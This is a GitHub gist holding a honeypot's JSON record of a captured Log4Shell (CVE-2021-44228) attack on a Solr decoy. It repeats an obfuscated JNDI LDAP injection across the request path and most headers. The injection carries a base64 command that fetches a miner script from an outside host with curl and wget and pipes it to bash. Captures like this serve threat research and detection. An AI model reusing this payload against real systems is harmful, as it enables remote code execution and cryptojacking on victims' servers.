Created
December 22, 2025 12:56
-
-
Save Chelsea486MHz/986be7c621ef53477b917787cf70e0f1 to your computer and use it in GitHub Desktop.
cve-2021-44228-20251122-133313-960053.json
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "version": "1.0", | |
| "metadata": { | |
| "timestamp": "2025-11-22T13:33:13.960053Z", | |
| "cve": "CVE-2021-44228", | |
| "client_ip": "172.20.0.3", | |
| "honeypot": "solr-log4shell", | |
| "context": "header:X-Originating-Ip" | |
| }, | |
| "request": { | |
| "method": "GET", | |
| "path": "/t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "protocol": "HTTP/1.0", | |
| "headers": { | |
| "Host": "152.228.218.63", | |
| "X-Real-Ip": "149.86.227.16", | |
| "Connection": "close", | |
| "User-Agent": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Accept": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Authentication": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Authorization": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Bearer": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Cookie": "JSESSIONID=t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Originating-Ip": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Referer": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "X-Api-Version": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "X-Client-Ip": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "X-Druid-Comment": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "X-Originating-Ip": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "X-Requested-With": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" | |
| } | |
| }, | |
| "body": { | |
| "raw": "Q29udGV4dDogaGVhZGVyOlgtT3JpZ2luYXRpbmctSXAKRnVsbCBQYXlsb2FkOiB0KCckeyR7ZW52Ok5hTjotan1uZGkke2VudjpOYU46LTp9JHtlbnY6TmFOOi1sfWRhcCR7ZW52Ok5hTjotOn0vLzE1MS4yNDIuNjkuMTA0OjMzMDYvVG9tY2F0QnlwYXNzL0NvbW1hbmQvQmFzZTY0L2NHdHBiR3dnTFdZZ0wzUnRjQzkzWVhSamFHVnlPeUJsZUhCdmNuUWdTRTlOUlQwdmRHMXdPeUJqZFhKc0lDMXpJQzFNSUdoMGRIQTZMeTh6TVM0MU5pNHlOeTQ1Tnk5elkzSnBjSFJ6THpSMGFHVndiMjlzWDIxcGJtVnlMbk5vSUh3Z1ltRnphQ0F0Y3pzZ2QyZGxkQ0F0Y1U4dElHaDBkSEE2THk4ek1TNDFOaTR5Tnk0NU55OXpZM0pwY0hSekx6UjBhR1Z3YjI5c1gyMXBibVZ5TG5Ob0lId2dZbUZ6YUNBdGN3PT19JykKTWF0Y2hlZCBQYXR0ZXJuOiB0KCckeyR7ZW52Ok5hTjotan1uZGkke2VudjpOYU46LTp9JHtlbnY6TmFOOi1sfWRhcCR7ZW52OgpDYXB0dXJlZCBHcm91cHM6ICgnan1uZGkke2VudjpOYU46LTp9JHtlbnY6TmFOOi1sfWRhcCR7ZW52OicsICdsfWRhcCcsIE5vbmUp", | |
| "checksum": { | |
| "algorithm": "sha256", | |
| "value": "4d11d8cd39bfc0f83358f9b169a0ed591d68d02137d06d74c29df5831ba56e08" | |
| }, | |
| "size": 546 | |
| }, | |
| "analysis": { | |
| "extracted_payloads": [ | |
| "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:", | |
| "j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:", | |
| "l}dap" | |
| ], | |
| "attack_type": "log4shell_jndi", | |
| "confidence": "high" | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment